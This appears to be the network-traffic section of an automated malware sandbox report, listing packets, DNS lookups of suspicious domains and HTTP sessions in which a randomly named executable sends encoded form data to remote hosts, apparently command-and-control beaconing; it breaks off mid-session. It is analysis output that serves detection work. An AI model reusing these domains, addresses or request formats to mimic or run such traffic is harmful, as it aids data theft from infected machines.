                              Dec 2, 2024 15:55:12.682034969 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690521955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690558910 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690587997 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.698659897 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.698728085 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.698740959 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.707050085 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.707123041 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.707154036 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.715926886 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.715975046 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.716145039 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.724627972 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.724730015 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.850563049 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.850645065 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.850728989 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.853259087 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.854202986 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.854238033 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.854306936 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.859680891 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.859731913 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.859776020 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.865134954 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.865185022 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.865271091 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.871014118 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.871067047 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.871113062 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876104116 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876127958 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876183987 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.881489038 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.881542921 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.881591082 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.887079000 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.887136936 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.887362957 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.892693043 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.892766953 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.892772913 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.897944927 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.898000002 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.898042917 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903320074 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903337955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903378010 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.908804893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.908858061 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.908945084 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.914316893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.914371967 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.914423943 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.919691086 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.919758081 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.919781923 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.925221920 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.925272942 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.925316095 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930869102 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930886984 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930993080 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.936157942 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.936212063 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.936228991 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.941560984 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.941617012 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.941706896 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.947004080 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.947057009 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.947115898 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.952464104 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.952516079 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.952548027 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.958060980 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.958152056 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.051440954 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.051645041 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.052644968 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.052741051 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.054261923 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.057167053 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.057324886 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.061443090 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.061495066 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.061566114 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.064977884 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.065022945 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.065078020 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.068986893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.069031000 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.069040060 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.073066950 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.073110104 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.073246002 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.075556040 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.094269037 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.214279890 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:18.440232038 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:18.560286045 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:18.560379028 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:18.578898907 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:18.698854923 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:19.954665899 CET8049977104.21.24.198192.168.2.7
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Dec 2, 2024 15:54:13.210357904 CET | 59826 | 53 | 192.168.2.7 | 1.1.1.1
                               Dec 2, 2024 15:54:13.788234949 CET | 53 | 59826 | 1.1.1.1 | 192.168.2.7
                               Dec 2, 2024 15:54:30.635068893 CET | 58814 | 53 | 192.168.2.7 | 1.1.1.1
                               Dec 2, 2024 15:54:31.134763956 CET | 53 | 58814 | 1.1.1.1 | 192.168.2.7
                               Dec 2, 2024 15:54:46.374255896 CET | 55596 | 53 | 192.168.2.7 | 1.1.1.1
                               Dec 2, 2024 15:54:46.942933083 CET | 53 | 55596 | 1.1.1.1 | 192.168.2.7
                               Dec 2, 2024 15:55:01.514724970 CET | 62960 | 53 | 192.168.2.7 | 1.1.1.1
                               Dec 2, 2024 15:55:02.343909979 CET | 53 | 62960 | 1.1.1.1 | 192.168.2.7
                               Dec 2, 2024 15:55:18.115888119 CET | 60365 | 53 | 192.168.2.7 | 1.1.1.1
                               Dec 2, 2024 15:55:18.436722040 CET | 53 | 60365 | 1.1.1.1 | 192.168.2.7
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Dec 2, 2024 15:54:13.210357904 CET | 192.168.2.7 | 1.1.1.1 | 0x1a03 | Standard query (0) | www.duwixushx.xyz | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:54:30.635068893 CET | 192.168.2.7 | 1.1.1.1 | 0xcf17 | Standard query (0) | www.1qcczjvh2.autos | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:54:46.374255896 CET | 192.168.2.7 | 1.1.1.1 | 0xe881 | Standard query (0) | www.yvcp3.info | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:55:01.514724970 CET | 192.168.2.7 | 1.1.1.1 | 0xc84e | Standard query (0) | www.guacamask.online | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:55:18.115888119 CET | 192.168.2.7 | 1.1.1.1 | 0x1d99 | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Dec 2, 2024 15:53:14.401393890 CET | 1.1.1.1 | 192.168.2.7 | 0x22de | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                               Dec 2, 2024 15:53:14.401393890 CET | 1.1.1.1 | 192.168.2.7 | 0x22de | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:54:13.788234949 CET | 1.1.1.1 | 192.168.2.7 | 0x1a03 | No error (0) | www.duwixushx.xyz | | 156.251.17.224 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:54:31.134763956 CET | 1.1.1.1 | 192.168.2.7 | 0xcf17 | No error (0) | www.1qcczjvh2.autos | 1.1qcczjvh2.autos | | CNAME (Canonical name) | IN (0x0001) | false
                               Dec 2, 2024 15:54:31.134763956 CET | 1.1.1.1 | 192.168.2.7 | 0xcf17 | No error (0) | 1.1qcczjvh2.autos | 1hong-fted.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false
                               Dec 2, 2024 15:54:31.134763956 CET | 1.1.1.1 | 192.168.2.7 | 0xcf17 | No error (0) | 1hong-fted.pels5zqo.shop | 1hong.pels5zqo.shop | | CNAME (Canonical name) | IN (0x0001) | false
                               Dec 2, 2024 15:54:31.134763956 CET | 1.1.1.1 | 192.168.2.7 | 0xcf17 | No error (0) | 1hong.pels5zqo.shop | | 129.226.153.85 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:54:46.942933083 CET | 1.1.1.1 | 192.168.2.7 | 0xe881 | No error (0) | www.yvcp3.info | | 47.254.140.255 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:55:02.343909979 CET | 1.1.1.1 | 192.168.2.7 | 0xc84e | No error (0) | www.guacamask.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:55:18.436722040 CET | 1.1.1.1 | 192.168.2.7 | 0x1d99 | No error (0) | www.supernutra01.online | | 104.21.24.198 | A (IP address) | IN (0x0001) | false
                               Dec 2, 2024 15:55:18.436722040 CET | 1.1.1.1 | 192.168.2.7 | 0x1d99 | No error (0) | www.supernutra01.online | | 172.67.220.36 | A (IP address) | IN (0x0001) | false
                              • www.duwixushx.xyz
                              • www.1qcczjvh2.autos
                              • www.yvcp3.info
                              • www.guacamask.online
                              • www.supernutra01.online
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Dec 2, 2024 15:54:13.926316023 CET | 528 | OUT | GET /bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOj HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.duwixushx.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                               Dec 2, 2024 15:54:15.558311939 CET | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 02 Dec 2024 14:54:15 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.7 | 49862 | 129.226.153.85 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Dec 2, 2024 15:54:31.274709940 CET | 803 | OUT | POST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx1/rYrwNSFNYeSU2BOwgt+keflbVQ85P94YP123W9rlavclJu+A==
                               Dec 2, 2024 15:54:32.863445044 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:32 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               2 | 192.168.2.7 | 49868 | 129.226.153.85 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Dec 2, 2024 15:54:33.932549000 CET | 823 | OUT | POST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70Nhd8Qds9w4BZqupNmJYj4b1BIBsmK7HvMKdP0cOIVyfOC3H1Ckm9eTdrczCAZLL5oiFCEWxIvzPOnvr9fIOOi11YJK2ijpBMEdFvvVj5ajagZPuFaTJNG/0PL3tG9MP9gPeC3jUSsBg1mkhZxmrfSI6ZLt7Vic0S/FR3oqo1MoBSYAbA/L8nGlWrtj9t0=
                               Dec 2, 2024 15:54:35.508409977 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               3 | 192.168.2.7 | 49875 | 129.226.153.85 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Dec 2, 2024 15:54:36.603183031 CET | 1836 | OUT | POST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70FhBfodtaE4TpqugtmdYj481AgNsmOrHs4KHp4cft1yI+C3F1DD7teCdrs3CAJLL5oiFEoW48zzJOnsq9fMZ+j71YRa2i35B8kdEP/ViKyjFQZBvFabJND90M/7tC1yP6MPcGmaRwE+9GWeroFXrvSB6quO6Uu/wxHFSFcbtDB/Zjl+TzjAzy3yI65y5qOwCCnQeMvL6dQQcEXVJ3YmTQ9vNslrSFGbeCwHmk0OGlzo+ahSoMAYGvmA40zf0GCaPX4uc5VyKzryipyJMk0BaFTVMjFAjUAXuwo1KboOLnYIAH2EsCqZu4Pc+R7IsLubeoMzVg0p9D5CWDxxkWhGFWFnRtvWmQ/LwXZLv5ngjCPe8vTIy7vsVV04ewNTgedT6pt/u/s0GWzEBqe6Eu3YHNLxhv6Ytx4akEl2bFcBLOPuZG+9W+y4CsMSz1ZEWTy+UqWxBbYmfx3ZVPkLMSQhzCG1gzlO2dqvhVrgWhwNUHOL2aqOudH60qYIXsRSReWuNbzscSa6Wr3LieG0plUieQEdovCOHCpzONfiMvIrgZb3cr2eR1gL7aA7zp2IphYMrwiOwnZHnXGMkrCc6sSRYKcdqB1KdCz/IjSK3grAmSPuo4OnvRDd+09BmOsFxdqpG4daYlaQxQTmsJpJ0/ErUYPD4ZOwkcI885Nf2PiLhtHi6bbKUKVVwPrdiKpBmLvAsePqIh6+DnwIn9onLxUBHLXvDg/CTF1afl7f5uYi+duPnw0sZ1C3NWsYDV7uDKBJCUt9117X1bCtA2Grh2elXs+B1oyML1DMhQ67kpbJWtbv9WOC7vvRcKzDQLzTS1BOv2ZIjDUmQ4G4801xO4dIQMKAyvWMpfn/4vZUX+l6rUUAx+LtmKnQL1ZV61t6z/632lGruWvZLYk6oKlgihWpeWkryPOY9vn2oNn+CrMTRHRcAaYjjytIvZXXGI3G9yCXzyzQk [TRUNCATED]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.7 | 49883 | 129.226.153.85 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:54:39.256793976 CET | 530 | OUT | GET /od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:54:40.854240894 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.7 | 49901 | 47.254.140.255 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:54:47.180071115 CET | 788 | OUT | POST /i7qk/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.yvcp3.info
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.yvcp3.info
                              Referer: http://www.yvcp3.info/i7qk/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=/3r+tUE/vSKrr3p8KEHocxVuFRlHORcHf7yyOnZqHjLwKYUPcjhz3hges/dxYl0r2xvIrSjJdH280kbmJ75GbWpsKQh1TZejZVLs89wxEP02M0N8o1Xrck7vSfsDgqEl4HX4x3PMIWmEa0OY6ennrQovi+YE0+TPDn1vZ7ceWht7B0F3dToRd4554rhntih++Q4RW6LRSLoS9wVdow==
                              Dec 2, 2024 15:54:48.458658934 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Mon, 02 Dec 2024 14:54:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Trace: 2BA2307CB09D5BCE513E9A111C4B077560E011CF4AD77CC8419F4FE01100
                              Set-Cookie: _csrf=3b4b0fde9b3dc4f4857cb02cd320607166595c4e6a98603cc9bf48ea1c75a3b6a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22usZSH9FSJfKQaAh0Zx-NRxrxSR5gpuhH%22%3B%7D; path=/; HttpOnly
                              Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="LOgWNLcwtEPXcLJQVJBI03q0aqYIeOc2UBwQ2eam4g5Zm0xn_wnyEJ0W-QE10SDjIMxH6FoAlU4DTiW-ltOKRg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                              Dec 2, 2024 15:54:48.458709955 CET | 18 | IN | Data Ascii: y></html>0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.7 | 49907 | 47.254.140.255 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:54:49.838357925 CET | 808 | OUT | POST /i7qk/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.yvcp3.info
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.yvcp3.info
                              Referer: http://www.yvcp3.info/i7qk/
